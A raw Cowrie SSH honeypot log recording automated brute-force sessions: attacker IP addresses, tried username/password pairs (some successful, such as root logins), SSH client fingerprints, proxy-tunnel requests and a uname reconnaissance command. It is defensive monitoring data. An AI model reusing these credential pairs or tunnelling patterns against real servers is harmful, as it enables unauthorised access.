{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.655075Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":17943,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:17943","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.707964Z","session":"9902cd81b362"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.760008Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":11669,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:11669","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.906286Z","session":"9902cd81b362"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:26:58.958321Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":32704,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:32704","sensor":"my-vps","timestamp":"2025-08-31T02:26:59.102236Z","session":"9902cd81b362"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T02:26:59.154255Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:26:59.206958Z","src_ip":"77.83.207.83","session":"9902cd81b362"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:01.942731Z","src_ip":"212.227.125.160","session":"cb4f93a87fdb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:27:02.091329Z","src_ip":"212.227.125.160","session":"cb4f93a87fdb"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":57672,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bcf2d17bc99","protocol":"ssh","message":"New connection: 41.226.27.251:57672 (1.2.3.4:22) [session: 2bcf2d17bc99]","sensor":"my-vps","timestamp":"2025-08-31T02:27:03.780966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:03.782460Z","src_ip":"41.226.27.251","session":"2bcf2d17bc99"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:27:03.825622Z","src_ip":"41.226.27.251","session":"2bcf2d17bc99"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"123456","message":"login attempt [svnuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:27:03.956519Z","src_ip":"41.226.27.251","session":"2bcf2d17bc99"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:05.131246Z","src_ip":"41.226.27.251","session":"2bcf2d17bc99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39742,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e6489270529","protocol":"ssh","message":"New connection: 212.227.235.229:39742 (1.2.3.4:22) [session: 7e6489270529]","sensor":"my-vps","timestamp":"2025-08-31T02:27:09.064008Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:09.957513Z","src_ip":"212.227.235.229","session":"7e6489270529"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:27:09.958396Z","src_ip":"212.227.235.229","session":"7e6489270529"}
{"eventid":"cowrie.session.connect","src_ip":"91.196.152.18","src_port":51921,"dst_ip":"1.2.3.4","dst_port":22,"session":"16c75d6ec137","protocol":"ssh","message":"New connection: 91.196.152.18:51921 (1.2.3.4:22) [session: 16c75d6ec137]","sensor":"my-vps","timestamp":"2025-08-31T02:27:11.425795Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:12.244190Z","src_ip":"91.196.152.18","session":"16c75d6ec137"}
{"eventid":"cowrie.session.connect","src_ip":"91.196.152.105","src_port":48055,"dst_ip":"1.2.3.4","dst_port":22,"session":"fcbd440dceea","protocol":"ssh","message":"New connection: 91.196.152.105:48055 (1.2.3.4:22) [session: fcbd440dceea]","sensor":"my-vps","timestamp":"2025-08-31T02:27:12.266381Z"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"letmein","message":"login attempt [elasticsearch/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:27:15.730005Z","src_ip":"212.227.235.229","session":"7e6489270529"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:17.543322Z","src_ip":"212.227.235.229","session":"7e6489270529"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60382,"dst_ip":"1.2.3.4","dst_port":22,"session":"46da8060c9f5","protocol":"ssh","message":"New connection: 212.227.125.160:60382 (1.2.3.4:22) [session: 46da8060c9f5]","sensor":"my-vps","timestamp":"2025-08-31T02:27:18.348978Z"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:20.118420Z","src_ip":"212.227.125.160","session":"46da8060c9f5"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:27:20.990393Z","src_ip":"212.227.125.160","session":"cb4f93a87fdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36294,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e6567765534","protocol":"ssh","message":"New connection: 212.227.235.229:36294 (1.2.3.4:22) [session: 4e6567765534]","sensor":"my-vps","timestamp":"2025-08-31T02:27:20.992654Z"}
{"eventid":"cowrie.session.closed","duration":"10.7","message":"Connection lost after 10.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:22.920959Z","src_ip":"91.196.152.105","session":"fcbd440dceea"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":40126,"dst_ip":"1.2.3.4","dst_port":22,"session":"cb913732ab46","protocol":"ssh","message":"New connection: 41.226.27.251:40126 (1.2.3.4:22) [session: cb913732ab46]","sensor":"my-vps","timestamp":"2025-08-31T02:27:23.630710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:23.647772Z","src_ip":"41.226.27.251","session":"cb913732ab46"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:27:23.674772Z","src_ip":"41.226.27.251","session":"cb913732ab46"}
{"eventid":"cowrie.login.failed","username":"dolphinscheduler","password":"123456","message":"login attempt [dolphinscheduler/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T02:27:23.849034Z","src_ip":"41.226.27.251","session":"cb913732ab46"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:24.790653Z","src_ip":"212.227.235.229","session":"4e6567765534"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:27:24.791417Z","src_ip":"212.227.235.229","session":"4e6567765534"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:25.101357Z","src_ip":"41.226.27.251","session":"cb913732ab46"}
{"eventid":"cowrie.session.closed","duration":"27.8","message":"Connection lost after 27.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:25.682766Z","src_ip":"212.227.125.160","session":"cb4f93a87fdb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59064,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0bfc4828c72","protocol":"ssh","message":"New connection: 212.227.125.160:59064 (1.2.3.4:22) [session: c0bfc4828c72]","sensor":"my-vps","timestamp":"2025-08-31T02:27:30.318399Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:30.885077Z","src_ip":"212.227.125.160","session":"c0bfc4828c72"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T02:27:30.886120Z","src_ip":"212.227.125.160","session":"c0bfc4828c72"}
{"eventid":"cowrie.login.failed","username":"elasticsearch","password":"letmein","message":"login attempt [elasticsearch/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T02:27:33.603132Z","src_ip":"212.227.125.160","session":"c0bfc4828c72"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-31T02:27:34.184010Z","src_ip":"212.227.235.229","session":"4e6567765534"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:35.116808Z","src_ip":"212.227.125.160","session":"c0bfc4828c72"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":49392,"dst_ip":"1.2.3.4","dst_port":22,"session":"b97c09854fa7","protocol":"ssh","message":"New connection: 201.148.180.50:49392 (1.2.3.4:22) [session: b97c09854fa7]","sensor":"my-vps","timestamp":"2025-08-31T02:27:37.257431Z"}
{"eventid":"cowrie.session.closed","duration":"17.9","message":"Connection lost after 17.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:38.862358Z","src_ip":"212.227.235.229","session":"4e6567765534"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60984,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca575cce2058","protocol":"ssh","message":"New connection: 212.227.125.160:60984 (1.2.3.4:22) [session: ca575cce2058]","sensor":"my-vps","timestamp":"2025-08-31T02:27:40.439222Z"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:40.665351Z","src_ip":"201.148.180.50","session":"b97c09854fa7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35282,"dst_ip":"1.2.3.4","dst_port":22,"session":"25c670b8ef86","protocol":"ssh","message":"New connection: 41.226.27.251:35282 (1.2.3.4:22) [session: 25c670b8ef86]","sensor":"my-vps","timestamp":"2025-08-31T02:27:43.786762Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:43.787693Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:27:43.831638Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.login.success","username":"root","password":"4r3e2w1q","message":"login attempt [root/4r3e2w1q] succeeded","sensor":"my-vps","timestamp":"2025-08-31T02:27:43.965069Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T02:27:44.068877Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T02:27:44.069655Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:44.114821Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T02:27:44.115901Z","src_ip":"41.226.27.251","session":"25c670b8ef86"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T02:27:52.249680Z","src_ip":"212.227.125.160","session":"ca575cce2058"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T02:27:52.251458Z","src_ip":"212.227.125.160","session":"ca575cce2058"}
{"eventid":"cowrie.session.connect","src_ip":"91.196.152.109","src_port":49849,"dst_ip":"1.2.3.4","dst_port":22,"session":"f18fa38883cd","protocol":"ssh","message":"New connection: 91.196.152.109:49849 (1.2.3.4:22) [session: f18fa38883cd]","sensor":"my-vps","timestamp":"2025-08-31T02:27:52.992831Z"}
